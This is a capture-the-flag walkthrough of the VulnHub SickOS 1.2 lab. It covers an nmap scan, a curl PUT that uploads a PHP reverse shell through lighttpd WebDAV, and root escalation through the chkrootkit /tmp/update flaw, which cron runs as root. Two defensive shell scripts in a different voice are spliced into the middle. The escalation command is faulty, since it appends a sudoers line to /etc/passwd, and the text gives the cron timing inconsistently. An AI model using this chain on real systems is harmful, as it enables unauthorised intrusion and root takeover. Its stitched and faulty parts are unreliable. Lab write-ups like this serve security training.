SickOS - VULNHUB - Linux - 1.2
Complete walkthrough of this season's content:
RECOGNITION PHASE:
NETWORK DISCOVERY:
We can use a couple of tools for this task. One of them is arp-scan, which sends ARP requests to the broadcast address and waits for the hosts' replies over the same protocol, as you can see below:
The other tool is netdiscover, which works on the same principle but takes the network interface as a parameter:
NMAP:
In this step, from the attacker machine we gather information about the open ports and services of our target machine. We can use some options to run scripts and obtain information about vulnerabilities on the remote host.
nmap -sC -sV -p - -n -v 192.168.1.35 -oN target_nmap
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-21 01:51 CEST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 01:51
Completed NSE at 01:51, 0.00s elapsed
Initiating NSE at 01:51
Completed NSE at 01:51, 0.00s elapsed
Initiating NSE at 01:51
Completed NSE at 01:51, 0.00s elapsed
Initiating Ping Scan at 01:51
Scanning 192.168.1.35 [2 ports]
Completed Ping Scan at 01:51, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 01:51
Scanning 192.168.1.35 [65535 ports]
Discovered open port 80/tcp on 192.168.1.35
Discovered open port 22/tcp on 192.168.1.35
Connect Scan Timing: About 19.24% done; ETC: 01:53 (0:02:10 remaining)
Stats: 0:00:39 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 25.50% done; ETC: 01:53 (0:01:54 remaining)
Connect Scan Timing: About 51.50% done; ETC: 01:53 (0:01:05 remaining)
Completed Connect Scan at 01:53, 112.46s elapsed (65535 total ports)
Initiating Service scan at 01:53
Scanning 2 services on 192.168.1.35
Completed Service scan at 01:53, 6.04s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.1.35.
Initiating NSE at 01:53
Completed NSE at 01:53, 0.11s elapsed
Initiating NSE at 01:53
Completed NSE at 01:53, 0.00s elapsed
Initiating NSE at 01:53
Completed NSE at 01:53, 0.00s elapsed
Nmap scan report for 192.168.1.35
Host is up (0.0028s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
| 2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_ 256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open http lighttpd 1.4.28
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Initiating NSE at 01:53
Completed NSE at 01:53, 0.00s elapsed
Initiating NSE at 01:53
Completed NSE at 01:53, 0.00s elapsed
Initiating NSE at 01:53
Completed NSE at 01:53, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.95 seconds
From the nmap scan we found the following open ports and services:
EXPLOITATION:
22 ssh
ssh root@192.168.1.35
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the ECDSA key sent by the remote host is
SHA256:jltI6lCnaj6Ef0DsVMo1PVZCPyfw1MAba7V9x4mpECc.
Please contact your system administrator.
Add correct host key in /home/kali/.ssh/known_hosts to get rid of this message.
Offending ECDSA key in /home/kali/.ssh/known_hosts:9
remove with:
ssh-keygen -f "/home/kali/.ssh/known_hosts" -R "192.168.1.35"
ECDSA host key for 192.168.1.35 has changed and you have requested strict checking.
Host key verification failed.
80 http
kali@kali:~/VULNHUB/SICKOS1.2/data$ exiftool blow.jpg
ExifTool Version Number : 12.09
File Name : blow.jpg
Directory : .
File Size : 46 kB
File Modification Date/Time : 2016:04:26 08:37:36+02:00
File Access Date/Time : 2021:08:21 02:04:15+02:00
File Inode Change Date/Time : 2021:08:21 02:04:15+02:00
File Permissions : rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 551
Image Height : 559
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 551x559
Megapixels : 0.308
It seems that the image has no hidden content, so we move on and crawl the web server on the target IP:
The web server exposes a test directory:
That directory is empty, but lighttpd's WebDAV support allows you to upload content to it:
curl -X OPTIONS http://192.168.1.35/test -v
* Trying 192.168.1.35:80...
* Connected to 192.168.1.35 (192.168.1.35) port 80 (#0)
> OPTIONS /test HTTP/1.1
> Host: 192.168.1.35
> User-Agent: curl/7.72.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Location: http://192.168.1.35/test/
< Content-Length: 0
< Date: Sat, 21 Aug 2021 10:14:20 GMT
< Server: lighttpd/1.4.28
<
* Connection #0 to host 192.168.1.35 left intact
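The OPTIONS response above is what tells you the directory is writable: the DAV header says WebDAV is on, and the Allow header lists PUT, DELETE, MKCOL and friends. The script below is an added example, not part of the walkthrough; it parses a captured OPTIONS response (the sample is constructed from the headers shown above, plus a constructed read-only response for comparison) and reports whether the directory advertises write access, which is the check a defender would run against every DAV-enabled path before exposing it without authentication.

```shell
#!/bin/sh
# Added example, not from the walkthrough: audit the methods a WebDAV
# directory advertises in its OPTIONS response and flag the ones that
# modify content. The sample response below is constructed from the
# headers lighttpd returned for /test in the walkthrough.

SAMPLE_RESPONSE='HTTP/1.1 301 Moved Permanently
DAV: 1,2
MS-Author-Via: DAV
Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
Location: http://192.168.1.35/test/
Content-Length: 0
Server: lighttpd/1.4.28'

# Constructed response from a directory where WebDAV is read-only,
# used as the negative case.
RO_RESPONSE='HTTP/1.1 200 OK
DAV: 1
Allow: OPTIONS, GET, HEAD, PROPFIND'

# Print the value of header $2 from raw response $1 (case-insensitive name,
# CR stripped); prints nothing when the header is absent.
header_value() {
    printf '%s\n' "$1" | tr -d '\r' | grep -i "^$2: " | head -n 1 | sed 's/^[^:]*: //'
}

# Succeeds when the server advertises WebDAV at all (a DAV header is present).
dav_enabled() {
    [ -n "$(header_value "$1" DAV)" ]
}

# Print the advertised methods that create, change or delete resources,
# one per line, in the order the server listed them.
dav_write_methods() {
    header_value "$1" Allow | tr ',' '\n' | tr -d ' ' \
        | grep -E '^(PUT|DELETE|MKCOL|MOVE|COPY|PROPPATCH)$'
}

# One-word verdict for a response: "writable" if any write method is
# advertised, "read-only" otherwise, "no-dav" if WebDAV is not enabled.
dav_verdict() {
    if ! dav_enabled "$1"; then
        echo no-dav
    elif [ -n "$(dav_write_methods "$1")" ]; then
        echo writable
    else
        echo read-only
    fi
}

# Usage: summarise the captured response from the walkthrough.
printf '%s -> %s\n' 'http://192.168.1.35/test/' "$(dav_verdict "$SAMPLE_RESPONSE")"
dav_write_methods "$SAMPLE_RESPONSE"
```

To use it on a live capture, save the output of `curl -X OPTIONS <url> -D - -o /dev/null` to a variable and pass it to dav_verdict; anything reported as writable should either require authentication or have write methods disabled in the server configuration.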
PUT operation:
kali@kali:~/VULNHUB/SICKOS1.2/scripts$ curl -X PUT --data-binary "`cat ./php-reverse-shell.php`" http://192.168.1.35/test/reverse-shell.php -v
* Trying 192.168.1.35:80...
* Connected to 192.168.1.35 (192.168.1.35) port 80 (#0)
> PUT /test/reverse-shell.php HTTP/1.1
> Host: 192.168.1.35
> User-Agent: curl/7.72.0
> Accept: */*
> Content-Length: 5490
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 5490 out of 5490 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Content-Length: 0
< Date: Sat, 21 Aug 2021 05:08:42 GMT
< Server: lighttpd/1.4.28
<
* Connection #0 to host 192.168.1.35 left intact
And we obtain a reverse shell:
PRIVILEGE ESCALATION
With Linux-exploit-suggester we found that the target host could be vulnerable to the Dirty COW exploit:
But the target machine starts rebooting when we run the exploit ;(. So we review the OS with the lse.sh script instead:
As you can see in the previous image, the operating system runs a task as root, invoked from the daily crontab:
$ ls -ltrh /etc/cron.daily | grep chkroot
-rwxr-xr-x 1 root root 2.0K Jun 4 2014 chkrootkit
It runs every minute:
So this is the escalation path:
The line 'file_port=$file_port $i' will execute all files specified in
$SLAPPER_FILES as the user chkrootkit is running (usually root), if
$file_port is empty, because of missing quotation marks around the
variable assignment.
Steps to reproduce:
- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)
Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.
If an attacker knows you are periodically running chkrootkit (like in
cron.daily) and has write access to /tmp (not mounted noexec), he may
easily take advantage of this.
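The whole escalation rests on one missing pair of quotes. The script below is an added example, not code from the walkthrough or from chkrootkit: it reproduces the unquoted assignment exactly as the advisory quotes it, beside the quoted form, inside a private temporary directory where the "update" file only creates a marker (a constructed stand-in for whatever a real /tmp/update might contain), so you can see why the vulnerable line runs the file and the corrected line does not.

```shell
#!/bin/sh
# Added example, not part of the walkthrough or of chkrootkit: a
# reproduction of the shell quoting bug the advisory describes, next to the
# corrected form. Everything happens in a private temporary directory; the
# "update" file here only drops a marker, standing in for whatever a real
# /tmp/update might contain.

DEMO_DIR=$(mktemp -d)
MARKER="$DEMO_DIR/marker"

# The "update" file: it proves that it ran by creating the marker.
printf '#!/bin/sh\ntouch "%s"\n' "$MARKER" > "$DEMO_DIR/update"
chmod +x "$DEMO_DIR/update"

# Report whether the last collector run executed the update file.
outcome() {
    if [ -f "$MARKER" ]; then echo executed; else echo not-executed; fi
}

# Vulnerable form, as quoted from chkrootkit: with file_port empty,
# the line becomes "file_port= $i", which the shell parses as "run $i with
# an empty file_port in its environment" instead of as an assignment.
buggy_collect() {
    rm -f "$MARKER"
    file_port=""
    for i in "$DEMO_DIR"/update; do
        file_port=$file_port $i
    done
    outcome
}

# Corrected form: with the right-hand side quoted the whole line is an
# assignment, so the file name is only appended to the list and nothing runs.
fixed_collect() {
    rm -f "$MARKER"
    file_port=""
    for i in "$DEMO_DIR"/update; do
        file_port="$file_port $i"
    done
    outcome
}

# Remove the temporary directory once done.
cleanup_demo() {
    rm -rf "$DEMO_DIR"
}

echo "unquoted assignment: $(buggy_collect)"
echo "quoted assignment:   $(fixed_collect)"
```

Run it with sh or bash; the first line reports executed and the second not-executed. The same pattern is worth grepping for in any root cron job that builds a list from untrusted file names: an assignment whose right-hand side is unquoted and may expand to empty.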
To exploit the vulnerability, we create a new file named update in the /tmp directory with the following content:
www-data@ubuntu:/tmp$ echo ' whoami > /tmp/user; echo "www-data ALL=(ALL) NOPASSWD: ALL" >> /etc/passwd ' > /tmp/update
Test the update script:
www-data@ubuntu:/tmp$ ./update
./update
./update: line 1: /etc/passwd: Permission denied
www-data@ubuntu:/tmp$ ls -ltrh
ls -ltrh
total 20K
-rw------- 1 www-data www-data 0 Aug 21 02:24 tmp.wV6wQqCjXQ
-rw------- 1 www-data www-data 0 Aug 21 02:24 tmp.Oj5cO0PhT2
-rwxrwxrwx 1 www-data www-data 77 Aug 21 02:46 update
-rw-rw-rw- 1 www-data www-data 9 Aug 21 02:47 user
srwxr-xr-x 1 www-data www-data 0 Aug 21 2021 php.socket-0
drwxrwxrwt 2 root root 4.0K Aug 21 2021 VMwareDnD
drwx------ 2 root root 4.0K Aug 21 2021 vmware-root
-rw-r--r-- 1 root root 1.6K Aug 21 2021 vgauthsvclog.txt.0
www-data@ubuntu:/tmp$ cat user
cat user
www-data
After cron execution:
www-data@ubuntu:/tmp$ ls -ltrh
ls -ltrh
total 20K
-rw------- 1 www-data www-data 0 Aug 21 02:24 tmp.wV6wQqCjXQ
-rw------- 1 www-data www-data 0 Aug 21 02:24 tmp.Oj5cO0PhT2
-rwxrwxrwx 1 www-data www-data 77 Aug 21 02:46 update
-rw-rw-rw- 1 www-data www-data 5 Aug 21 02:48 user
srwxr-xr-x 1 www-data www-data 0 Aug 21 2021 php.socket-0
drwxrwxrwt 2 root root 4.0K Aug 21 2021 VMwareDnD
drwx------ 2 root root 4.0K Aug 21 2021 vmware-root
-rw-r--r-- 1 root root 1.6K Aug 21 2021 vgauthsvclog.txt.0
www-data@ubuntu:/tmp$ cat user
cat user
root
And we obtain code execution as the root user: